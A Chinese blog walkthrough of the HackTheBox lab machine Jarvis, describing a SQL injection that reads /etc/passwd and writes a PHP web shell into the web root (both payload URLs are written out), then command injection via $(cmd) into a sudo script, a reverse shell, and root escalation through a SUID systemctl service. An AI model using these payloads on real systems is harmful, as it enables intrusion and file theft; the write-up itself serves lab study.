No.165-HackTheBox-Linux-Jarvis-Walkthrough渗透学习

最新推荐文章于 2022-11-21 14:06:57 发布
最新推荐文章于 2022-11-21 14:06:57 发布
阅读量258 收藏
点赞数
分类专栏: Hack The box 文章标签: java linux python 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34801745/article/details/107420511
版权

**

HackTheBox-Linux-Jarvis-Walkthrough

**
¬
靶机地址:https://www.hackthebox.eu/home/machines/profile/194
靶机难度:初级(4.7/10)
靶机发布日期:2019年9月9日
靶机描述:
Jarvis is a medium difficulty Linux box running a web server, which has DoS and brute force protection enabled. A page is found to be vulnerable to SQL injection, which requires manual exploitation. This service allows the writing of a shell to the web root for the foothold. The www user is allowed to execute a script as another user, and the script is vulnerable to command injection. On further enumeration, systemctl is found to have the SUID bit set, which is leveraged to gain a root shell.

作者:大余
时间:2020-07-18

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在这里插入图片描述
可以看到靶机的IP是10.10.10.143…
在这里插入图片描述
我这里利用Masscan快速的扫描出了21,22,64999端口,在利用nmap详细的扫描了三个端口信息,22是ssh,64999是http服务等…
在这里插入图片描述
访问到端口80上的Apache服务器,可以看到一个名为“ Stark Hotel”的页面…

在这里插入图片描述
可看到该页面有订餐页面,也有订房页面…

在这里插入图片描述
随意进入一个订房页面,发现URL,存在sql注入…
在这里插入图片描述
测试发现可利用sql注入提权…
在这里插入图片描述
命令:http://10.10.10.143/room.php?cod=-1 union select 1,load_file('/etc/passwd'),3,4,5,6,7
发现了2存在注入点,查看到了passwd信息…

在这里插入图片描述
利用into outfile创建了文本…将查看到的信息放入了文本中…测试看

在这里插入图片描述
可看到,成功的,那么简单了,写个shell提权即可…
在这里插入图片描述
命令:http://10.10.10.143/room.php?cod=-1 union select 1,'<?php system($_REQUEST["dayu"]);?>',3,4,5,6,7 into outfile '/var/www/html/dayu.php'
简单写入cmd命令…

在这里插入图片描述
然后利用cmd直接写入shell,获得了反向外壳www权限…但是无法读取user_flag信息…
在这里插入图片描述
sudo发现了all存在simpler.py脚本…查看
在这里插入图片描述
查看脚本,看到它使用-p参数获取IP地址,然后使用os.system()函数执行ping…
脚本还阻止了一些字符(&;-`| |)以防止注入…
但不会阻止字符“ $”,“()字符,这可以通过bash命令替换即“ $(cmd)”注入命令提权…
在这里插入图片描述
可以看到该命令被用户名pepper代替,并且ping尝试将其解析为主机名说明命令执行成功…
那么可以使用它来执行bash反向shell,并获得一个shell作为Pepper…
由于某些特殊字符被阻止,我将命令写入脚本并通过注入执行它…
在这里插入图片描述
简单的shell写入即可…
然后执行shell获得了反向外壳pepper用户权限…获得了user_flag信息…
由于这个外壳不稳定…我进行了ssh

在这里插入图片描述
创建.ssh,并本地生成ssh-key…然后写入到pepper中…(简单操作)
在这里插入图片描述
ssh登录后,枚举了SUID,发现存在systemctl…
systemctl命令用于管理运行systemd的系统上的服务…google看看怎么利用…
在这里插入图片描述
google发现了挺多提权的办法…
只需要创建一个服务,该服务在启动时执行我们选择的文件,然后使用它systemctl来启用和启动它…这样就能执行了
在这里插入图片描述
我创建了一个简单的bash-shell,然后创建service服务,并利用systemctl进行启动,启动后执行.sh的shell,并获得了root权限的反向外壳…
获得了root_flag信息…

简单的sql注入–systemctl(SUID)提权…

由于我们已经成功得到root权限查看user和root.txt,因此完成这台初级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

大余xiyou
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
No.3-Jarvis-难度普通-HTB-walkthrough
weixin_43851945的博客
01-22 431
No.3-Jarvis-难度普通-HTB-walkthrough ** 挺有意思的一台机器,有挺多种方式拿 low priv shell。 ** 攻击机:官方Kali linux 2019 64位 作者:Ikonw 靶机介绍 一,端口扫描 只有HTTP 比较有兴趣,title 是 Stark Hotel Starting Nmap 7.80 ( https://nmap.org ) at 202...
Linux之--查看CPU和内存使用情况
qq_34851243的博客
09-22 609
Linux查看CPU和内存使用情况一、top命令ps指令pamp命令free命令 一、top命令 top命令是Linux下常用的性能分析工具,能够实时显示系统中各个进程的资源占用状况,类似于Windows的任务管理器。 运行 top 命令后,CPU 使用状态会以全屏的方式显示,并且会处在对话的模式 – 用基于 top 的命令,可以控制显示方式等等。退出 top 的命令为 q (在 top 运行中敲...
Jarvis:适用于Linux和macOS的个人助理
02-04
贾维斯 Linux,MacOS和Windows的个人助理 Jarvis是适用于Linux,MacOS和Windows的简单个人助手,可在命令行上运行。 如果您启用他的声音,他可以与您交谈。 他可以告诉您天气,可以找到您附近的餐馆和其他地方。 他可以为您做一些很棒的事情。 入门 为了启动Jarvis,只需克隆并运行python installer 。 通过jarvis命令从任何地方运行Jarvis 在Mac OS X上,运行source setup.sh 在Windows上运行setup.bat 您可以通过在Jarvis命令行中键入help开始,以检查Jarvis可以为您做什么。 Y
基于Linux平台下的语音管家Jarvis
今天你AC了吗
07-10 370
语音管家Jarvis1.项目简介2.项目技术点3.项目基本执行流程 1.项目简介 使用C++编写一个智能AI对话和语音命令执行的语音管理工具 借助图灵机器人和百度语音识别和合成等第三方平台和第三方工具 除基本交流功能外还可以执行基Linux下的基本指令(支持自己配置) 2.项目技术点 C++ STL库中的map和unordered_map的使用 http第三方库,使用post进行http请求 调用图灵机器人的API并接入Linux平台 百度语音识别和语音合成SDK Linux系统编程&网络编程
Python-Jarvis用于Linux的私人助理
08-11
Jarvis – 用于Linux的私人助理
Jarvis后台管理模板
12-13
Jarvis后台管理模板是一款Jarvis Smart Admin模板。
Jarvis-Musical-Bot:Jarvis Telegram Music Bot for Spotify
04-06
Jarvis Telegram Music Bot for Spotify 该Telegram机器人允许用户授权其Spotify帐户并获得不错的功能。 授权实际上不收集用户昵称以外的任何私人数据。 其特点: 分享当前歌曲。 您可以共享Spotify客户端上当前...
jarvis:JARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
02-05
jarvis:JARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
J.A.R.V.I.S - The Digital Life Assistant-开源
05-29
"J.A.R.V.I.S - The Digital Life Assistant" 是一款基于 DOS 操作系统的开源软件项目,灵感来源于漫威电影《钢铁侠》中的智能系统。这款数字生活助手能够帮助用户进行日常生活的管理,如设置闹钟、获取最新新闻以及...
Python库 | jarvis_tools-10.23.2018-py2.py3-none-any.whl
03-31
资源分类:Python库 所属语言:Python 资源全名:jarvis_tools-10.23.2018-py2.py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
【Hack The Box】linux练习-- Jarvis
人间体佐菲的博客
11-21 338
【Hack The Box】linux练习-- Jarvis
java执行Linux命令
Jarvis_技术专栏
10-18 4092
<br />如果运用java执行Linux命令 一个简单的例子:<br />/** * 修改Linux目录权限 * @param path */ public boolean chmod(String path) { // LogUtil.LogCommInfo("------修改权限路劲 path="+path); boolean flag = false ; try{ String cmdStrs[] = new String[]{"chmod","-R
Hack the box靶机 Jarvis
菜浪马废的博客
05-23 266
有sql注入 查看到是7列 2345位置是有回显的 说实话我今天有点累了 好想用sqlmap啊 DBadmin:2D2B7A5E4E637B8FBA1D17F40318F277D29964D0 imissyou 看到一个.py脚本 执行ping命令 有了user的权限 什么也看不见 nc一下 ...
Linux基础操作(一)初识命令
JarvisAI的小屋
09-12 170
一、命令 命令行一般指命令提示符,即在操作系统中,提示进行命令输入的一种工作提示符。在不同的操作系统环境下,命令提示符各不相同。 二、命令行解析器 命令行解释器是一个单独的软件程序,它可在用户和操作系统之间提供直接的通讯。命令行解释器是解释器的一种,用于对命令行进行解释执行。 2.1 Unix shell Unix shell,通常被称作“命令行”,为Unix和类Unix操作系统提供了传统的用户界面。用户通过输入shell所执行的命令,引导计算机的操作。在微软Windows操作系统平台,类似程序是
Hackthebox walkthrough - Legacy(考点:smb利用 blue)
冬萍子癸水
04-27 592
namp走起可见又是smb。但这次没有像LAME靶机那样直接显示版本号。 于是nmap -p 445 --script vuln 10.10.10.4走一波。用NMAP的脚本扫端口 ok显示 ms08-067是个突破点 上msf,search ms08-067, use exploit/windows/smb/ms08_067_netapi , options, set rhost 10.10...
靶机渗透_hackthebox__jarvis -7
qq_34717555的博客
11-11 571
目标IP:10.10.10.143 Nmap scan report for supersecurehotel.htb (10.10.10.143) Host is up (0.28s latency). Not shown: 939 closed ports, 58 filtered ports PORT STATE SERVICE VERSION 22/tcp open ss...
初探百度大数据分析挖掘平台Jarvis
数据分析
08-10 2346
在人工智能时代,企业既想通过大数据分析、挖掘技术提升效率,又被大数据量分析、机器学习挖掘等相关技术门槛阻扰,需要一款数据分析挖掘产品跨越这个鸿沟。Jarvis在这个背景下...
Linux的常用命令
Jarvis_V的博客
04-17 982
linux常用命令 (一)学习linux终端命令的原因 1、linux没有图形界面,所有的操作全靠命令完成,如磁盘操作,文件存取,目标操作,进程管理,文件权限设定等。 2、在职场中,大量的服务器维护工作都是在远程通过SS和客户端来完成的。 (二)终端使用技巧 1、方向键 上下 切换之前的命令 2、方向键 左右 移动光标 3、ctrl + a : 移动光标到命令的头部 4、ctrl ...
Hackthebox-Jarvis (Machine Maker: manulqwerty & Ghostpp7)
weixin_43202322的博客
09-19 659
目录前言0x00 注入注入0x01提权总结 前言 IP: 10.10.10.143 友好的盒子 0x00 注入注入 在web页面逛逛,在预定房间页面, url: “http://10.10.10.143/room.php?cod=2” 这不测试一下注入枉自为人了,很快可以发现这是个完全没有过滤的数字型注入: payload: “2 and sleep(5)” 成功延时,那还有啥好说...
Error: Cannot find module '@babel/plugin-proposal-object-rest-spread' Require stack: - D:\workspace-hjm\jarvis-cmc\node_modules\@babel\core\lib\config\files\plugins.js - D:\workspace-hjm\jarvis-cmc\node_modules\@babel\core\lib\config\files\index.js - D:\workspace-hjm\jarvis-cmc\node_modules\@babel\core\lib\index.js - D:\workspace-hjm\jarvis-cmc\node_modules\@vue\cli-plugin-babel\index.js - D:\workspace-hjm\jarvis-cmc\node_modules\@vue\cli-service\lib\Service.js - D:\workspace-hjm\jarvis-cmc\node_modules\@vue\cli-service\bin\vue-cli-service.js - Did you mean "@babel/plugin-transform-object-rest-spread"? Make sure that all the Babel plugins and presets you are using are defined as dependencies or devDependencies in your package.json file. It's possible that the missing plugin is loaded by a preset you are using that forgot to add the plugin to its dependencies: you can workaround this problem by explicitly adding the missing package to your top-level package.json.
最新发布
07-22
这个错误提示表明在你的项目中找不到 `@babel/plugin-proposal-object-rest-spread` 这个模块。这可能是由于缺少该模块或者配置问题导致的。 解决方法如下: 1. 确保你的项目中已经安装了 `@babel/plugin-proposal...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值